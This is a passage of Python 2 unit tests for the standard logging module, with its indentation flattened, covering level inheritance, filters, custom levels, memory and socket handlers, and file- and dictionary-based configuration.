('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warn(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warn(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warn(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_invalid_name(self):
self.assertRaises(TypeError, logging.getLogger, any)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
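# A hypothetical sketch of such a mapping (not used in the tests below):
#
#     APP_TO_LOGGING = {0: logging.DEBUG, 1: logging.INFO, 2: logging.ERROR}
#     logger.log(APP_TO_LOGGING[app_level], msg)
#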
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
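# Concretely: the handler above was built as MemoryHandler(10,
# logging.WARNING, ...), so it flushes after 10 buffered records or on
# any record at WARNING or above.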
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warn(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
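# (The deliberate error is the "sys.stbout" typo in the handler args.)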
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
def apply_config(self, conf):
file = cStringIO.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class LogRecordStreamHandler(StreamRequestHandler):
"""Handler for a streaming logging request. It saves the log message in the
TCP server's 'log_output' attribute."""
TCP_LOG_END = "!!!END!!!"
def handle(self):
"""Handle multiple requests - each expected to be of 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally."""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
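# ">L" is a big-endian unsigned 32-bit length prefix; this matches the
# framing SocketHandler uses when sending (length prefix, then pickle).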
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unpickle(chunk)
record = logging.makeLogRecord(obj)
self.handle_log_record(record)
def unpickle(self, data):
return cPickle.loads(data)
def handle_log_record(self, record):
# If the end-of-messages sentinel is seen, tell the server to
# terminate.
if self.TCP_LOG_END in record.msg:
self.server.abort = 1
return
self.server.log_output += record.msg + "\n"
class LogRecordSocketReceiver(ThreadingTCPServer):
"""A simple-minded TCP socket-based logging receiver suitable for test
purposes."""
allow_reuse_address = 1
log_output = ""
def __init__(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = False
self.timeout = 0.1
self.finished = threading.Event()
def serve_until_stopped(self):
while not self.abort:
rd, wr, ex = select.select([self.socket.fileno()], [], [],
self.timeout)
if rd:
self.handle_request()
# Notify the main thread that we're about to exit
self.finished.set()
# close the listen socket
self.server_close()
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.tcpserver = LogRecordSocketReceiver(port=0)
self.port = self.tcpserver.socket.getsockname()[1]
self.threads = [
threading.Thread(target=self.tcpserver.serve_until_stopped)]
for thread in self.threads:
thread.start()
self.sock_hdlr = logging.handlers.SocketHandler('localhost', self.port)
self.sock_hdlr.setFormatter(self.root_formatter)
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.tcpserver.abort = True
del self.tcpserver
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
for thread in self.threads:
thread.join(2.0)
finally:
BaseTest.tearDown(self)
def get_output(self):
"""Get the log output as received by the TCP server."""
# Signal the TCP receiver and wait for it to terminate.
self.root_logger.critical(LogRecordStreamHandler.TCP_LOG_END)
self.tcpserver.finished.wait(2.0)
return self.tcpserver.log_output
@unittest.skipIf(os.name=='java' and os._name=='nt',
'Blocks test completion on Jython Windows.')
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
logger.debug("eggs")
self.assertEqual(self.get_output(), "spam\neggs\n")
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assert_survival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assert_survival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fn = tempfile.mktemp(".log")
# The non-ASCII data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn)
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn)
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = u'\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = cStringIO.StringIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, '\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
try:
warnings.filterwarnings("always", category=UserWarning)
file = cStringIO.StringIO()
h = logging.StreamHandler(file)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = file.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
file = cStringIO.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
file, "Dummy line")
s = file.getvalue()
file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
finally:
logging.captureWarnings(False)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
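# Note: 'ext://sys.stdout' below is resolved by dictConfig as a
# reference to an external object, i.e. the interpreter's sys.stdout.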
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
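# The special '()' key names a factory for the object: a dotted-path
# string here, or an actual callable as in config4a below.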
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
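# config8 sets 'disable_existing_loggers' to False, so loggers that
# already exist when the config is applied (e.g. compiler.parser) are
# left enabled even though they are not named in it.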
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
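# config9a and config9b are incremental configs ('incremental': True):
# dictConfig then only adjusts the levels of existing handlers and
# loggers instead of replacing them.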
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
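# The filter's 'name' creates logging.Filter('compiler.parser'), which
# passes only records logged by that logger or its descendants.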
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
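# cfg:// values are resolved against this same dictionary, so
# 'cfg://handler_configs[hand1]' points at the dict stored under
# 'handler_configs' -> 'hand1' below.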
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
